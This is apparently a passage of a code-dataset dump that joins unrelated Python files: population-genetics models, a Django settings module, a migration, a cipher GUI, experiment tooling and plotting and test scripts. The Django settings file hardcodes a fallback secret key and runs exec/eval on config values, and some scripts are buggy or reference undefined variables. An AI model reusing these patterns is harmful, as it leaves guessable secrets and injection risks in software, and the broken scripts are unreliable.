\"AFR_dmel\",\n \"description\": \"African D. melanogaster population\"\n }\n\n # Single population in this model\n self.population_configurations = [\n msprime.PopulationConfiguration(initial_size=N_R, metadata=metadata_afr),\n ]\n self.demographic_events = [\n # Size change at bottleneck (back in time; BIT)\n msprime.PopulationParametersChange(\n time=t_1, initial_size=N_B, population_id=0),\n # Size change at recovery (BIT)\n msprime.PopulationParametersChange(\n time=t_2, initial_size=N_A, population_id=0)\n ]\n self.migration_matrix = [[0]]\n\n\nclass LiStephanTwoPopulation(models.Model):\n \"\"\"\n Model Name:\n LiStephanTwoPopulation\n\n Model Description:\n The three epoch (modern, bottleneck, ancestral) model estimated for two\n Drosophila Melanogaster populations: African (ancestral) and European (derived)\n from `Li and Stephan `_ .\n\n Model population indexes:\n - African D. melanogaster: 0\n - European D. melanogaster: 1\n\n Parameter Table:\n .. csv-table::\n :widths: 15 8 20\n :header: \"Parameter Type (units)\", \"Value\", \"Description\"\n :file: ../docs/parameter_tables/drosophila_melanogaster/LiStephanTwoPopulation_params.csv\n\n CLI help:\n python -m stdpopsim drosophila-melanogaster LiStephanTwoPopulation -h\n\n Citation:\n Li, H. & Stephan, W. Inferring the Demographic History and Rate of Adaptive Substitution in Drosophila. PLOS Genetics 2, e166 (2006).\n\n \"\"\" # noqa: E501\n\n author = \"Li et al.\"\n year = 2006\n doi = \"https://doi.org/10.1371/journal.pgen.0020166\"\n\n def __init__(self):\n\n # African Parameter values from \"Demographic History of the African\n # Population\" section\n N_A0 = 8.603e06\n t_A0 = 600000 # assuming 10 generations / year\n N_A1 = N_A0 / 5.0\n self.generation_time = default_generation_time\n\n # European Parameter values from \"Demo History of Euro Population\"\n N_E0 = 1.075e06\n N_E1 = 2200\n t_AE = 158000 # generations\n t_E1 = t_AE - 3400\n\n metadata_afr = {\n \"name\": \"AFR_dmel\",\n \"description\": \"African D. melanogaster population\"\n }\n metadata_eu = {\n \"name\": \"EU_dmel\",\n \"description\": \"European D. melanogaster population\"\n }\n\n self.population_configurations = [\n msprime.PopulationConfiguration(initial_size=N_A0, metadata=metadata_afr),\n msprime.PopulationConfiguration(initial_size=N_E0, metadata=metadata_eu)\n ]\n self.demographic_events = [\n # Size change at Euro bottleneck\n msprime.PopulationParametersChange(\n time=t_E1, initial_size=N_E1, population_id=1),\n # Split\n msprime.MassMigration(\n time=t_AE, source=1, destination=0, proportion=1.0),\n # African bottleneck\n msprime.PopulationParametersChange(\n time=t_A0, initial_size=N_A1, population_id=0)\n ]\n self.migration_matrix = [\n [0, 0],\n [0, 0],\n ]\n","sub_path":"stdpopsim/drosophila_melanogaster.py","file_name":"drosophila_melanogaster.py","file_ext":"py","file_size_in_byte":7410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"149961711","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport os\nfrom os.path import (\n abspath, dirname, join\n)\n\nfrom common.loader import (\n load_apps, load_settings, load_variable_settings, load_cache_settings,\n load_database_settings, get_variable_value, get_database_config,\n)\n\nfrom common.constants import (\n CONFIDENTIAL_HOME_ENV_NAME, RUNNING_MODE_DEBUG, RUNNING_MODE_ENV_NAME, PROJECT_ROOT,\n SECTION, OPTION, LOGS_PATH, DATABASE_PATH, WEB_SRC_PATH, DJANGO_SRC_PATH\n)\n\nfrom common.utils import (\n create_dir_safely, filter_out_none\n)\n\nfrom common.parser import load_configs\n\nfrom .logging_config import LOGGER_CONF\n\n\n# --- Load CMPortal.cfg ---\n_CONFIG = load_configs('',\n join(os.getenv(CONFIDENTIAL_HOME_ENV_NAME, join(dirname(abspath(__file__)), 'conf')), 'CMPortal.cfg')\n)\n\n# --- Debug flag setting ---\nRUNNING_MODE_ENV_VALUE = os.getenv(RUNNING_MODE_ENV_NAME)\nDEBUG = True if RUNNING_MODE_ENV_VALUE == RUNNING_MODE_DEBUG else _CONFIG.getboolean('Django', 'DEBUG')\n\n# --- Load active app and config settings ---\nACTIVE_APPS = None if not _CONFIG.has_option('Django', 'ACTIVE_APPS') else dict(\n (app.strip(), True) for app in _CONFIG.get('Django', 'ACTIVE_APPS').split(',')\n)\n\nactive_apps = load_apps(ACTIVE_APPS)\nfor app_name in active_apps:\n for v in load_settings(app_name):\n exec('from %s.config.settings import %s' % (app_name, v))\n\n for vd in load_variable_settings(app_name):\n if not _CONFIG.has_option(vd[SECTION], vd[OPTION]): continue\n _value = get_variable_value(_CONFIG, vd)\n exec ('%s=_value' % vd['name'])\n\n# --- Configure datebases ---\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': join(DATABASE_PATH, 'Apollo.db'),\n },\n}\nDATABASE_APPS_MAPPING = dict()\nDATABASES['default'].update(get_database_config(_CONFIG))\nDATABASE_ROUTERS = ['common.router.DatabaseAppsRouter']\nfor app_name in active_apps:\n database, database_mapping = load_database_settings(app_name)\n DATABASES.update(database)\n DATABASE_APPS_MAPPING.update(database_mapping)\n\n# --- Configure caches ---\nCACHES = {\n 'default': {\n 'BACKEND': _CONFIG.get('Django::cache', 'BACKEND') or (\n 'django.core.cache.backends.locmem.LocMemCache' if DEBUG else 'uwsgicache.UWSGICache'),\n 'LOCATION': eval(_CONFIG.get('Django::cache', 'LOCATION')) if _CONFIG.get(\n 'Django::cache', 'LOCATION') else ('locmem-for-debug' if DEBUG else 'default'),\n 'TIMEOUT': _CONFIG.getint('Django::cache', 'TIMEOUT') if _CONFIG.has_option(\n 'Django::cache', 'TIMEOUT') else 300,\n 'OPTIONS': {\n 'MAX_ENTRIES': _CONFIG.getint('Django::cache', 'MAX_ENTRIES'),\n 'CULL_FREQUENCY': _CONFIG.getint('Django::cache', 'CULL_FREQUENCY')\n },\n 'KEY_PREFIX': 'cmportal',\n 'VERSION': '1'\n },\n}\nfor app_name in active_apps:\n cache_conf = load_cache_settings(app_name)\n CACHES.update(cache_conf)\n\n# --- Project Start ---\nSITE_ID = 1\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = _CONFIG.get('Django', 'SECRET_KEY') or 'j=f$+!uvk20q7vc2-)huhyqww+@f#okj2b7fytx3@4=g(e@db-'\n\nROOT_URLCONF = 'configs.urls'\n\nLOGIN_URL = u'/account/login/'\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = 'configs.wsgi.application'\n\n# --- configure language code ---\nLANGUAGE_CODE = 'zh-Hans'\nLANGUAGES = (\n ('en-us', 'English'),\n ('zh-Hans', 'Simplified Chines'),\n)\n\n# --- configure timezone and Internationlization---\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nTIME_ZONE = 'Asia/Shanghai'\n\n# --- configure locale path ---\nLOCALE_PATHS = (\n os.path.join(DJANGO_SRC_PATH, \"locales\"),\n)\n\nAUTH_USER_MODEL = 'accounts.Account'\n\n# --- AccessControl Start ---\nALLOWED_HOSTS = _CONFIG.get('Django', 'ALLOWED_HOSTS').split(',') if _CONFIG.has_option('Django', 'ALLOWED_HOSTS') else ['localhost']\n\n# --- flag to control minifying html files ---\nHTML_MINIFY = _CONFIG.getboolean('Django', 'HTML_MINIFY'\n ) if _CONFIG.has_option('Django', 'HTML_MINIFY') else not DEBUG\n\n# --- configure session cookie domain ----\nSESSION_COOKIE_DOMAIN = _CONFIG.get('Django', 'SESSION_COOKIE_DOMAIN')\n\n# -- confiugre logger ---\nLOGGING = LOGGER_CONF\n\n# --- Configure media path ---\nMEDIA_ROOT = _CONFIG.get('Django', 'MEDIA_ROOT') or join(PROJECT_ROOT, 'media')\nMEDIA_URL = '/media/'\n\n# --- Configure static path ---\nSTATIC_URL = '/static/'\nSTATIC_ROOT = _CONFIG.get('Django', 'STATIC_ROOT') or join(PROJECT_ROOT, 'static')\nSTATICFILES_DIRS = [\n WEB_SRC_PATH,\n]\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n\n# --- Configure Template loader/context_processor/middleware_class/install_apps ---\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.contrib.messages.context_processors.messages',\n 'django.core.context_processors.request',\n 'django.core.context_processors.i18n',\n ],\n 'debug': True if RUNNING_MODE_ENV_VALUE == RUNNING_MODE_DEBUG else _CONFIG.getboolean('Django', 'TEMPLATE_DEBUG'),\n },\n },\n]\n\nMIDDLEWARE_CLASSES = filter(None, [\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django_user_agents.middleware.UserAgentMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'pagination.middleware.PaginationMiddleware',\n 'htmlmin.middleware.HtmlMinifyMiddleware',\n 'htmlmin.middleware.MarkRequestMiddleware',\n])\n\nINSTALLED_APPS = filter(None, [\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n 'pagination',\n 'mathfilters',\n])\nINSTALLED_APPS.extend(active_apps)\n","sub_path":"djangosrc/pysrc/configs/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"230633164","text":"def selection_sort(list):\n print(\"listnya adalah\", list)\n for i in range (len(list)-1):\n index_min = i \n for j in range(i+1, len(list)):\n if list[index_min] < list[j]:\n index_min = j\n\n #penukaran\n tempat = list[i]\n list[i] = list[index_min]\n list[index_min] = tempat\n \n print('indeks ke:', i+1, 'tukar dengan :', index_min)\n print('iterasi', i, list)\n\n\nselection_sort([4,3,5,6,2,78,98])\n","sub_path":"Alpro 1/P4.py","file_name":"P4.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"434794904","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('management', '0010_auto_20150904_1350'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='homeimg',\n name='home_img_id',\n ),\n migrations.RemoveField(\n model_name='instruments',\n name='item_id',\n ),\n migrations.RemoveField(\n model_name='orderlist',\n name='order_id',\n ),\n migrations.AddField(\n model_name='homeimg',\n name='id',\n field=models.AutoField(auto_created=True, primary_key=True, default=0, serialize=False, verbose_name='ID'),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='instruments',\n name='id',\n field=models.AutoField(auto_created=True, primary_key=True, default=0, serialize=False, verbose_name='ID'),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='orderlist',\n name='id',\n field=models.AutoField(auto_created=True, primary_key=True, default=0, serialize=False, verbose_name='ID'),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='cart',\n name='id',\n field=models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True),\n ),\n ]\n","sub_path":"weborder/management/migrations/0011_auto_20150904_1406.py","file_name":"0011_auto_20150904_1406.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"172963805","text":"import yaml\nimport os\nfrom pypost.common.SettingsClient import SettingsClient\nfrom pypost.common.SettingsManager import setRootSettings\nfrom pypost.common.Settings import Settings\n\n\nclass Evaluation(SettingsClient):\n '''\n classdocs\n '''\n\n def __init__(self, experiment, evaluationID, settings, parameterNames = None,\n parameterValues = None, numTrials=1):\n '''\n Constructor\n '''\n SettingsClient.__init__(self)\n\n self.numTrials = numTrials\n self.evaluationID = evaluationID\n self.parameterNames = parameterNames\n self.parameterValues = parameterValues\n self.globalTrialIDs = []\n\n\n if isinstance(settings, str):\n self.settings = Settings('evaluation')\n self.settings.load(os.path.join(settings, 'settings.yaml'))\n setRootSettings(self.settings)\n\n with open(os.path.join(settings, 'eval.yaml'), 'r') as stream:\n evalSettings = yaml.load(stream)\n\n self.numTrials = evalSettings['numTrials']\n self.parameterNames = evalSettings['parameterNames']\n self.parameterValues = evalSettings['parameterValues']\n\n else:\n self.settings = settings\n\n\n self.setExperiment(experiment, evaluationID)\n print(\"Directory is %s\" % self.path)\n\n def setExperiment(self, experiment, evaluationID):\n self.evaluationName = 'eval%03d' % evaluationID\n self.path = os.path.join(experiment.experimentPath, self.evaluationName)\n self.experiment = experiment\n\n def createFileStructure(self, overwrite):\n if not os.path.exists(self.path):\n os.mkdir(self.path)\n\n settingsPath = os.path.join(self.path, 'settings.yaml')\n evalPath = os.path.join(self.path, 'eval.yaml')\n\n self.settings.store(settingsPath)\n dataToStore = dict()\n dataToStore['numTrials'] = self.numTrials\n dataToStore['parameterNames'] = self.parameterNames\n dataToStore['parameterValues'] = self.parameterValues\n\n with open(evalPath, 'w') as stream:\n yaml.dump(dataToStore, stream)\n\n for i in range(0, self.numTrials):\n trialPath = os.path.join(self.path, 'trial%03d' % i)\n if not os.path.isfile(os.path.join(trialPath, 'data.npy')):\n trial = self.experiment.createTrial(self.path, i, self.settings)\n trial.storeTrial(overwrite)\n else:\n print(\"Found existing trial %03d, not recreating\" % i)\n trialId = self.experiment.registerTrial(self, trialPath)\n self.globalTrialIDs.append(trialId)\n\n for root, dirs, files in os.walk(self.path):\n for d in dirs:\n os.chmod(os.path.join(root, d), 0o775)\n for f in files:\n os.chmod(os.path.join(root, f), 0o775)\n\n def startLocal(self, trialIds = None):\n if trialIds:\n trialIds = self.globalTrialIDs[trialIds]\n else:\n trialIds = self.globalTrialIDs\n\n self.experiment.startLocal(trialIds)\n\n def startSLURM(self, trialIds=None):\n if trialIds:\n trialIds = self.globalTrialIDs[trialIds]\n else:\n trialIds = self.globalTrialIDs\n\n self.experiment.startSLURM(trialIds)\n\n def loadTrialFromID(self, trialID):\n globalID = self.globalTrialIDs[trialID]\n return self.experiment.loadTrialFromID(globalID)\n\n def getNumTrials(self):\n return len(self.globalTrialIDs)","sub_path":"src/pypost/experiments/Evaluation.py","file_name":"Evaluation.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"284512265","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# -*- coding: cp1254 -*-\n\nimport sys\nimport time\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\na = (\":#><`$|{[]}@.,;!^+&/()=?_%-* ~abcdefghijklmnopqrstwyzuvxUABCDEFGHIJKLMNOQPRSTWXVYZ1234567890'\" + \"\\\\\" + \"\\\"\"+u\"ĞÜŞÇÖİğüşıöç\" + u\"飨æß\")\n\nclass DaVinci(QWidget):\n\tdef __init__(self, parent=None):\n\t\n\t\tQWidget.__init__(self,parent)\n\t\tself.setGeometry(300,200,600,400)\n\t\tself.setWindowTitle(u\"DaVinci (Şifreleme ve Deşifreleme)\")\n\t\tself.setWindowIcon(QIcon(\".\\\\anonymous.png\"))\n\t\tself.KLabel = QLabel(\"Anahtar Kelime:\",self)\n\t\tself.TLabel = QLabel(u\"Metin Ekranı:\",self)\n\t\tself.RLabel = QLabel(u\"Sonuç Ekranı:\",self)\n\t\tself.EButton = QPushButton(u\"Şifrele\")\n\t\tself.DButton = QPushButton(u\"Deşifrele\")\n\t\tself.KEdit = QLineEdit(self)\n\t\tself.TEdit = QTextEdit(self)\n\t\tself.REdit = QPlainTextEdit(self)\n\t\tself.REdit.setReadOnly(1)\n\t\tself.connect(self.EButton,SIGNAL(\"clicked()\"),self.Encrypt)\n\t\tself.connect(self.DButton,SIGNAL(\"clicked()\"),self.Decrypt)\n\t\tself.grid = QGridLayout()\n\t\tself.grid.setSpacing(10)\n\t\tself.grid.addWidget(self.KLabel,0,0)\n\t\tself.grid.addWidget(self.TLabel,1,0)\n\t\tself.grid.addWidget(self.RLabel,2,0)\n\t\tself.grid.addWidget(self.KEdit,0,1)\n\t\tself.grid.addWidget(self.TEdit,1,1)\n\t\tself.grid.addWidget(self.REdit,2,1)\n\t\tself.grid.addWidget(self.EButton,3,1)\n\t\tself.grid.addWidget(self.DButton,4,1)\n\t\tself.setLayout(self.grid)\n\t\t\n\tdef Encrypt(self):\n\t\tkey = unicode(self.KEdit.text())\n\t\tword = unicode(self.TEdit.toPlainText())\n\t\tword = len(key) * \" \" + \":\" + word\n\t\tson = \"\"\n\t\ti = 0\n\t\tfor k in word:\n\t\t\tif i >= len(key):\n\t\t\t\t\ti = 0\n\t\t\tif a.find(k) + a.find(key[i]) + 1 >= len(a):\n\t\t\t\tson = son + a[a.find(k) + a.find(key[i]) - len(a)]\n\t\t\telse:\n\t\t\t\tson = son + a[a.find(k) + a.find(key[i])]\n\t\t\t\t\n\t\t\ti = i + 1\n\t\t\n\t\tself.REdit.setPlainText(son)\n\t\t\n\tdef Decrypt(self):\n\t\tkey = unicode(self.KEdit.text())\n\t\tword = unicode(self.TEdit.toPlainText())\n\t\tson = \"\"\n\t\ti = 0\n\t\tfor k in word:\n\t\t\tif i >= len(key):\n\t\t\t\t\ti = 0\n\t\t\tif a.find(k) - a.find(key[i]) + 1 < 0:\n\t\t\t\tson = son + a[a.find(k) - a.find(key[i]) + len(a)]\n\t\t\telse:\n\t\t\t\tson = son + a[a.find(k) - a.find(key[i])]\n\t\t\ti = i + 1\n\t\tson = son[len(key) + 1:]\n\t\tself.REdit.setPlainText(son)\n\napp = QApplication(sys.argv)\nDaVinci = DaVinci()\nDaVinci.show()\nsys.exit(app.exec_())\n","sub_path":"DaVinciQt.py","file_name":"DaVinciQt.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"728377","text":"import numpy as np\nimport sys\nimport os\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import NullFormatter\nstdev = np.std\nsqrt = np.sqrt\nnullfmt = NullFormatter()\n\ndef plot_1d(xdata1, ydata1, yerr1, xdata2, ydata2, yerr2, x_axis, y_axis, system):\n plt.errorbar(xdata1, ydata1, yerr1, color='k',label=\"Explicit\",errorevery=3,elinewidth=1.5)\n plt.errorbar(xdata2, ydata2, yerr2, color='r',label=\"IS-SPA (cpu)\",errorevery=3,elinewidth=1.5)\n plt.errorbar(xdata3, ydata3, yerr3, color='b',label=\"IS-SPA (gpu)\",errorevery=3,elinewidth=1.5)\n plt.errorbar(xdata4, ydata4, yerr4, color='g',label=\"IS-SPA (gpu) old\",errorevery=3,elinewidth=1.5)\n plt.grid(b=True, which='major', axis='both', color='#808080', linestyle='--')\n plt.xlabel(r'%s' %(x_axis), size=12)\n plt.ylabel(r'%s' %(y_axis), size=12)\n plt.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), shadow=True, ncol=2, fontsize = 'medium')\n plt.xlim((0,16))\n #plt.ylim((1.5, 3.0))\n plt.savefig('%s.PMF.4.png' %(system))\n plt.close()\n\n\ndata1 = np.loadtxt(\"ADI2.exp.pmf.bs.dat\")\ndata2 = np.loadtxt(\"EMUS.cpu.pmf.dat\")\nplot_1d(data1[index1:,0], data1[index1:,i], data1[index1:,i+1], data2[:,0], data2[:,1], data2[:,2], data3[:,0], data3[:,1], data3[:,2], data4[:,0], data4[:,1], data4[:,2], 'Distance ($\\AA$)', '$u_{pmf}$ (kcal/mol)', \"ADI2\")\n","sub_path":"algorithm_1/ADI2_US/EMUS/CPU/old/plot4.py","file_name":"plot4.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"363714458","text":"# -*- coding: utf8 -*-\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom tuskar_ui.test import helpers as test\nfrom tuskar_ui.utils import utils\n\n\nclass TestItem(object):\n def __init__(self, index):\n self.index = index\n\n\nclass UtilsTests(test.TestCase):\n def test_filter_items(self):\n items = [TestItem(i) for i in range(7)]\n\n first = utils.filter_items(items, index=0)\n even = utils.filter_items(items, index__in=(0, 2, 4, 6))\n last_two = utils.filter_items(items, index__not_in=range(5))\n\n self.assertEqual(utils.length(first), 1)\n self.assertEqual(utils.length(even), 4)\n self.assertEqual(utils.length(last_two), 2)\n","sub_path":"tuskar_ui/test/utils_tests.py","file_name":"utils_tests.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"362561213","text":"import unittest\nfrom stats_series_generator.categorical_streams import CorrelatedWeightedCategoricalStreams\nimport numpy as np\nimport copy\n\nclass TestCorrelatedWeightedCategoricalStreams(unittest.TestCase):\n def setUp(self):\n np.random.seed(seed=13)\n self.rnd_stream = CorrelatedWeightedCategoricalStreams()\n\n\n def tearDown(self):\n self.rnd_stream = None\n\n def test_get_set_params(self):\n weights = copy.deepcopy(self.rnd_stream.weights)\n np.random.seed(seed=13)\n x = self.rnd_stream.get_samples(10)\n\n self.rnd_stream.weights = weights\n np.random.seed(seed=13)\n y = self.rnd_stream.get_samples(10)\n \n self.assertTrue(np.all(x==y))\n\n def test_0_stats(self):\n N = 100000\n p_n = 1.0/N\n x = self.rnd_stream.get_samples(N)\n p_x = {}\n for x_i in x[0,:]:\n if x_i not in p_x:\n p_x[x_i] = 0.0\n p_x[x_i] += p_n\n \n y = self.rnd_stream.weights['weights']\n error = [np.sqrt((1.0-v)*v/N) for v in y[0]]\n t_2sigma_test = [np.abs(y[0][k]-v)<=2*error[k] for k,v in p_x.items()]\n\n self.assertTrue(np.all(t_2sigma_test))\n\n def test_i_stats(self):\n N = 100000\n w = self.rnd_stream.weights['weights']\n p_n_i = 1.0/(N*w[0]) \n\n x = self.rnd_stream.get_samples(N)\n n_columns = len(x[:,0]) - 1\n\n p = {}\n N_i = {}\n for x in np.transpose(x):\n x_0 = x[0]\n if x_0 not in p:\n p[x_0] = []\n N_i[x_0] = 0\n for i in range(n_columns):\n p[x_0].append({})\n N_i[x_0] += 1\n for x_i,y in enumerate(x[1:]):\n if y not in p[x_0][x_i]:\n p[x_0][x_i][y] = 0\n p[x_0][x_i][y] += p_n_i[x_0]\n\n np_p = [[]]*(len(p)+1)\n for i, p_i in p.items():\n np_p_i = []\n for p_ij in p_i:\n p_ij_list = [0.0]*(max(p_ij)+1)\n for k in p_ij:\n p_ij_list[k] = p_ij[k]\n np_p_i.append(np.array(p_ij_list))\n np_p[i]=np_p_i\n p = np_p\n\n t_scores = []\n for i, (w_i, p_i) in enumerate(zip(w[1:],p)):\n for w_ij, p_ij in zip(w_i, p_i):\n delta = abs(w_ij - p_ij)\n error = [np.sqrt((1.0-v)*v/(N_i[i])) for v in w_ij]\n t_2sigma_test = [d_i/e_i for d_i,e_i in zip(delta,error)]\n t_scores.extend(t_2sigma_test)\n\n n_scores = len(t_scores)\n n_2outliers = len([x for x in t_scores if x>2.0])\n percent_2outliers = 1.0*n_2outliers/n_scores\n self.assertTrue(percent_2outliers<=0.05)\n\n n_1outliers = len([x for x in t_scores if x>1.0])\n percent_1outliers = 1.0*n_1outliers/n_scores\n self.assertTrue(percent_1outliers<=0.32)\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_correlated_weighted_categorical_streams.py","file_name":"test_correlated_weighted_categorical_streams.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"286272264","text":"import cv2 as cv\r\nimport numpy as np\r\n\r\nRED = (0, 0, 255)\r\nGREEN = (0, 255, 0)\r\nBLUE = (255, 0, 0)\r\nCYAN = (255, 255, 0)\r\nMAGENTA = (255, 0, 255)\r\nYELLOW = (0, 255, 255)\r\nWHITE = (255, 255, 255)\r\n\r\ncolors = (RED, GREEN, BLUE, CYAN, MAGENTA, YELLOW, WHITE)\r\np0, p1 = (100, 30), (400, 90)\r\n\r\ndef trackbar(x):\r\n color = colors[x]\r\n img[:] = 0\r\n cv.line(img, p0, p1, color, 10)\r\n cv.imshow('window', img)\r\n\r\nimg = np.zeros((100, 500, 3), np.uint8)\r\ncv.line(img, p0, p1, RED, 10)\r\ncv.imshow('window', img)\r\ncv.createTrackbar('color', 'window', 0, 6, trackbar)\r\n\r\ncv.waitKey(0)\r\ncv.destroyAllWindows()","sub_path":"DrawingShapes_Part3.py","file_name":"DrawingShapes_Part3.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"45341908","text":"\"\"\"\nПредсказывание одной цифры из MNIST\n\"\"\"\n\nimport numpy as np\nimport random as r\n\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense\nfrom keras.utils import np_utils\nfrom keras.models import load_model\n\n# the data, shuffled and split between tran and test sets\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\nX_train = X_train.reshape(60000, 784)\nX_test = X_test.reshape(10000, 784)\nX_train = X_train.astype(\"float32\")\nX_test = X_test.astype(\"float32\")\nX_train /= 255\nX_test /= 255\nprint(X_train.shape[0], 'train samples')\nprint(X_test.shape[0], 'test samples')\n\nmodel = load_model(\"mnist_model.h5\")\n\n\"\"\" Пробуем предсказать \"\"\"\nour_images = X_train[r.randrange(0, 60000)]\nfrom matplotlib import pyplot as plt\nplt.imshow(our_images.reshape((28,28)))\n\n#our_images = our_images.astype(\"float32\")\nresult = np.ndarray.flatten(model.predict(our_images.reshape(1, 784)))\nprint('Prediction:')\nprint('This is 0 - ' + str(result[0]*100) + ' %')\nprint('This is 1 - ' + str(result[1]*100) + ' %')\nprint('This is 2 - ' + str(result[2]*100) + ' %')\nprint('This is 3 - ' + str(result[3]*100) + ' %')\nprint('This is 4 - ' + str(result[4]*100) + ' %')\nprint('This is 5 - ' + str(result[5]*100) + ' %')\nprint('This is 6 - ' + str(result[6]*100) + ' %')\nprint('This is 7 - ' + str(result[7]*100) + ' %')\nprint('This is 8 - ' + str(result[8]*100) + ' %')\nprint('This is 9 - ' + str(result[9]*100) + ' %')\n\n#это выводит картинку на экран\nplt.show()","sub_path":"keras-perceptron/example1_PredictOneSample.py","file_name":"example1_PredictOneSample.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"286359266","text":"from nodeconductor.cost_tracking import CostTrackingStrategy, ConsumableItem\n\nfrom . import models, ApplicationTypes, OsTypes, SupportTypes, PriceItemTypes\n\n\nclass InstanceStrategy(CostTrackingStrategy):\n resource_class = models.Instance\n\n class Types(object):\n FLAVOR = PriceItemTypes.FLAVOR\n LICENSE_APPLICATION = PriceItemTypes.LICENSE_APPLICATION\n LICENSE_OS = PriceItemTypes.LICENSE_OS\n SUPPORT = PriceItemTypes.SUPPORT\n\n @classmethod\n def get_consumable_items(cls):\n for os, name in OsTypes.CHOICES:\n yield ConsumableItem(item_type=cls.Types.LICENSE_OS, key=os, name='OS: %s' % os)\n\n for key, name in ApplicationTypes.CHOICES:\n yield ConsumableItem(\n item_type=cls.Types.LICENSE_APPLICATION, key=key, name='Application: %s' % name)\n\n for key, name in SupportTypes.CHOICES:\n yield ConsumableItem(item_type=cls.Types.SUPPORT, key=key, name='Support: %s' % name)\n\n for flavor_name in set(models.Flavor.objects.all().values_list('name', flat=True)):\n yield ConsumableItem(item_type=cls.Types.FLAVOR, key=flavor_name, name='Flavor: %s' % flavor_name)\n\n @classmethod\n def get_configuration(cls, instance):\n States = models.Instance.States\n RuntimeStates = models.Instance.RuntimeStates\n tags = [t.name for t in instance.tags.all()]\n\n consumables = {}\n for type in (cls.Types.LICENSE_APPLICATION, cls.Types.LICENSE_OS, cls.Types.SUPPORT):\n try:\n key = [t.split(':')[1] for t in tags if t.startswith('%s:' % type)][0]\n except IndexError:\n continue\n consumables[ConsumableItem(item_type=type, key=key)] = 1\n\n if instance.state == States.OK and instance.runtime_state == RuntimeStates.ACTIVE:\n consumables[ConsumableItem(item_type=cls.Types.FLAVOR, key=instance.flavor_name)] = 1\n return consumables\n\n\nclass VolumeStrategy(CostTrackingStrategy):\n resource_class = models.Volume\n\n class Types(object):\n STORAGE = PriceItemTypes.STORAGE\n\n class Keys(object):\n STORAGE = '1 GB'\n\n @classmethod\n def get_consumable_items(cls):\n return [ConsumableItem(item_type=cls.Types.STORAGE, key=cls.Keys.STORAGE, name='1 GB of storage', units='GB')]\n\n @classmethod\n def get_configuration(cls, volume):\n return {ConsumableItem(item_type=cls.Types.STORAGE, key=cls.Keys.STORAGE): float(volume.size) / 1024}\n\n\nclass SnapshotStrategy(CostTrackingStrategy):\n resource_class = models.Snapshot\n\n class Types(object):\n STORAGE = PriceItemTypes.STORAGE\n\n class Keys(object):\n STORAGE = '1 GB'\n\n @classmethod\n def 